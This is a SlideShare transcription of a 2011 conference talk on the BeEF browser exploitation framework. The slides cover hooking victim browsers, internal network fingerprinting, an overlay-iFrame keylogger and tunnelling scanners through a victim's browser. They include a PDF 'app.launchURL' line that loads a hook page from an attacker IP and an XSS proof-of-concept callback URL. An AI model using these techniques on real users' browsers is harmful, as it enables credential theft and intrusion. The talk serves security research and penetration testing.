SlideShare ist ein Scribd-Unternehmen logo

Hacktivity2011 be ef-preso_micheleorru

Michele Orru
Michele Orru
Technologie
1 von 35
Downloaden Sie, um offline zu lesen
Dr. Strangelove or: how I Learned to Stop Worrying and Love the BeEF Michele “antisnatchor” Orru’ 18 September 2011
Who am I? ❖ Penetration Tester @ The Royal Bank of Scotland ❖ BeEF core developer: - Tunneling Proxy, - XssRays integration, - various exploits, - lot of bug-fixing, testing and fun ❖ Kubrick fan ❖ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ❖@antisnatchor ❖http://antisnatchor.com
outline: cutting, devouring and digesting the legs off a browser ❖ What the hell is BeEF? ❖Cutting - Target enumeration and analysis ❖Devouring - Internal net fingerprint - Exploiting internal services through the hooked browser - Keylogging, browser pwnage ❖Digesting - Persistence, tunneling sqlmap/Burp through BeEF proxy - XSSrays integration ❖Future development and ideas
The Browser Nowadays
What the hell is BeEF? ❖ BeEF: Browser Exploitation Framework ❖Pioneered by Wade Alcorn in 2005 (public release) ❖Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ❖Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ❖ The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context.
What the hell is BeEF?
Cutting: Target enum and analysis ❖ Lot of juicy information after first hook initialization : ❖Browser/OS version ❖Cookies ❖Browser plugins ❖Supported features (Google Gears, Web Sockets, Flash, Java, . .) ❖Specific modules are also there to help ❖Detect links/visited URLs ❖Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ❖Execute your custom Javascript
Cutting: Target enum and analysis
Devouring: Internal net fingerprint ❖Recon/NetworkFingerprinting module Watch „Jboss 6.0.0M1 JMX Deploy Exploit: ❖Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. (http://vimeo.com/24410203) the BeEF way... ” on Vimeo ❖The approach currently in use is similar to Yokoso (InGuardians) ❖Map of device/application default images ❖img tags are loaded into the victim DOM ❖Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found
Devouring: Internal net fingerprint ❖Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ❖ They developed new BeEF modules ❖ They are working with us and their work will be available in BeEF trunk soon. A few examples: ❖Internal DNS enumeration ❖Reliable Port Scanning ❖Ping sweep
Devouring: exploiting internal services ❖Network/JbossJmxUploadExploit module Watch „Jboss 6.0.0M1 JMX Deploy Exploit: ❖JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) (http://vimeo.com/24410203) the BeEF way... ” on Vimeo ❖Then why not use the victim browser as a pivot?
Devouring: persistent keylogging ❖Persistence/ iFrameKeylogger module ❖We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ❖After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
Devouring: module autorun ❖ We’ve ported back (from the old PHP version) the autorun feature ❖Add autorun: true in the command module config.yaml that you want to autorun ❖When a new browser will be hooked in BeEF, the module will be automatically launched ❖Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...
Digesting: hook default browser ❖Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” ❖Browser/HookDefault module ❖We use a PDF in order to attempt hooking the default browser ❖When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ❖app.launchURL("http://192.168.56.1/page-With-BeEF- Hook-Js.html",true); ❖If everything will be ok, we hooked the default browser. ❖Future improvements: configurable bounce page and ruby pdf library
Digesting: tunneling proxy ❖Having a communication channel with the hooked browser, we can: ❖Receive requests as a proxy on BeEF ❖Translate these requests to XHRs (in- domain) ❖Parse the XHRs responses and send the data back to the original requestor...
Digesting: tunneling proxy ❖Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ❖browsing the authenticated surface of the hooked domain through the security context of the victim browser; ❖spidering the hooked domain through the security context of the victim browser; ❖finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
Digesting: tunneling proxy Let see the tunneling proxy in action! (demo time)
Digesting: XssRays ❖ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ❖ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ❖What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path.
Digesting: XssRays ❖The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ❖This is now patched by all recent browsers. So how to check for XSSs cross- domain, respecting the SOP restrictions?
Digesting: XssRays ❖We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ❖No false positives (oh yes, that’s what I like)! ❖Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9b Ifg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http:// 192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript %3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script %20injection%20double&method=GET
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Digesting: XssRays
Future dev and ideas ❖Improve XssRays: ❖add more attack vectors, more testing ❖add JS depth crawler ❖Multi-hooking: a browser can be hooked on multiple domains ❖Check for time-based blind SQLi cross- domain via JS ❖Improve the BeEF console (command line UI) ❖Well...take a look here: http:// code.google.com/p/beef/issues/list
Get in touch with us ❖Follow the BeEF: @beefproject ❖Checkout BeEF: http://code.google.com/p/ beef/ ❖Check our website: http://beefproject.com ❖Have fun with it ❖We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
Thanks to ❖Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ❖My colleagues Piotr & Michal ❖My employer ❖Hacktivity crew and you attendees
Questions? Thanks for your time!

Empfohlen

Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 

Empfohlen

Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 
Php push notifications
Php push notificationsPhp push notifications
Php push notificationsMohammed Shurrab
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Owning the bad guys
Owning the bad guys Owning the bad guys
Owning the bad guys Santhosh Kumar
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersSaumil Shah
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuJan Voracek
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScriptjeresig
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingRoel Palmaers
 
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEFDr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEFMichele Orru'
 
Rockstalgia2
Rockstalgia2Rockstalgia2
Rockstalgia2La Cobacha Studios
 

Weitere ähnliche Inhalte

Was ist angesagt?

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPressdsero
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersSaumil Shah
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuJan Voracek
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScriptjeresig
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingRoel Palmaers
 

Was ist angesagt? (20)

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentation
 
Php push notifications
Php push notificationsPhp push notifications
Php push notifications
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Owning the bad guys
Owning the bad guys Owning the bad guys
Owning the bad guys
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSockets
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressu
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScript
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprinting
 

Andere mochten auch

Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEFDr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEFMichele Orru'
 
2006 Cegarra et al forced ventilation al composting
2006 Cegarra et al forced ventilation al composting2006 Cegarra et al forced ventilation al composting
2006 Cegarra et al forced ventilation al compostingGermán Tortosa
 
Anura informatics co 2016 1.3
Anura informatics co 2016 1.3Anura informatics co 2016 1.3
Anura informatics co 2016 1.3anuimark123
 
Presentación la audacia del poder
Presentación la audacia del poderPresentación la audacia del poder
Presentación la audacia del poderlvicky
 
Catalogo balanzas sartorius
Catalogo balanzas sartoriusCatalogo balanzas sartorius
Catalogo balanzas sartorius007thor1981
 
Nordtagung2011 programm
Nordtagung2011 programmNordtagung2011 programm
Nordtagung2011 programmICV_eV
 
Presentación1 mi tio.com
Presentación1 mi tio.comPresentación1 mi tio.com
Presentación1 mi tio.comCATALOGO2012
 
El declive de la clase media y la sociedad low cost
El declive de la clase media y la sociedad low costEl declive de la clase media y la sociedad low cost
El declive de la clase media y la sociedad low costDaemon Quest Deloitte
 
Presupuesto
PresupuestoPresupuesto
Presupuestonega2014
 
Apc partners general profile
Apc partners general profileApc partners general profile
Apc partners general profileAldo Cattapan
 
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...ario darmawan
 
Terapias reflexivas sistémicas. Colaboración Cuba España
Terapias reflexivas sistémicas. Colaboración Cuba EspañaTerapias reflexivas sistémicas. Colaboración Cuba España
Terapias reflexivas sistémicas. Colaboración Cuba EspañaJosep Segui Dolz
 
Papel jose carlos
Papel jose carlosPapel jose carlos
Papel jose carlosLeyre_prof
 

Andere mochten auch (20)

Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEFDr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
 
Rockstalgia2
Rockstalgia2Rockstalgia2
Rockstalgia2
 
pride cv 2016
pride cv 2016pride cv 2016
pride cv 2016
 
2006 Cegarra et al forced ventilation al composting
2006 Cegarra et al forced ventilation al composting2006 Cegarra et al forced ventilation al composting
2006 Cegarra et al forced ventilation al composting
 
Anura informatics co 2016 1.3
Anura informatics co 2016 1.3Anura informatics co 2016 1.3
Anura informatics co 2016 1.3
 
Presentación la audacia del poder
Presentación la audacia del poderPresentación la audacia del poder
Presentación la audacia del poder
 
Catalogo balanzas sartorius
Catalogo balanzas sartoriusCatalogo balanzas sartorius
Catalogo balanzas sartorius
 
Nordtagung2011 programm
Nordtagung2011 programmNordtagung2011 programm
Nordtagung2011 programm
 
Clase 2 -
Clase 2 -Clase 2 -
Clase 2 -
 
Presentación1 mi tio.com
Presentación1 mi tio.comPresentación1 mi tio.com
Presentación1 mi tio.com
 
El declive de la clase media y la sociedad low cost
El declive de la clase media y la sociedad low costEl declive de la clase media y la sociedad low cost
El declive de la clase media y la sociedad low cost
 
Presentación Yeastar Nordata
Presentación Yeastar NordataPresentación Yeastar Nordata
Presentación Yeastar Nordata
 
Presupuesto
PresupuestoPresupuesto
Presupuesto
 
Recursos web 2.0
Recursos web 2.0Recursos web 2.0
Recursos web 2.0
 
Apc partners general profile
Apc partners general profileApc partners general profile
Apc partners general profile
 
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...
Artikel Sistem Informasi, Ario Darmawan, Kevin Sunjaya, Bagaskoro Sabastian,...
 
Magenta
MagentaMagenta
Magenta
 
Terapias reflexivas sistémicas. Colaboración Cuba España
Terapias reflexivas sistémicas. Colaboración Cuba EspañaTerapias reflexivas sistémicas. Colaboración Cuba España
Terapias reflexivas sistémicas. Colaboración Cuba España
 
Affordable websites
Affordable websitesAffordable websites
Affordable websites
 
Papel jose carlos
Papel jose carlosPapel jose carlos
Papel jose carlos
 

Ähnlich wie Hacktivity2011 be ef-preso_micheleorru

DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFMichele Orru
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...YaJUG
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsChema Alonso
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Frédéric Harper
 
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan PolandBruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Polandbrucelawson
 
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Frédéric Harper
 
Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-airbrucelawson
 
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Frédéric Harper
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 

Ähnlich wie Hacktivity2011 be ef-preso_micheleorru (20)

DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnets
 
BeEF
BeEFBeEF
BeEF
 
Ht w23
Ht w23Ht w23
Ht w23
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan PolandBruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
 
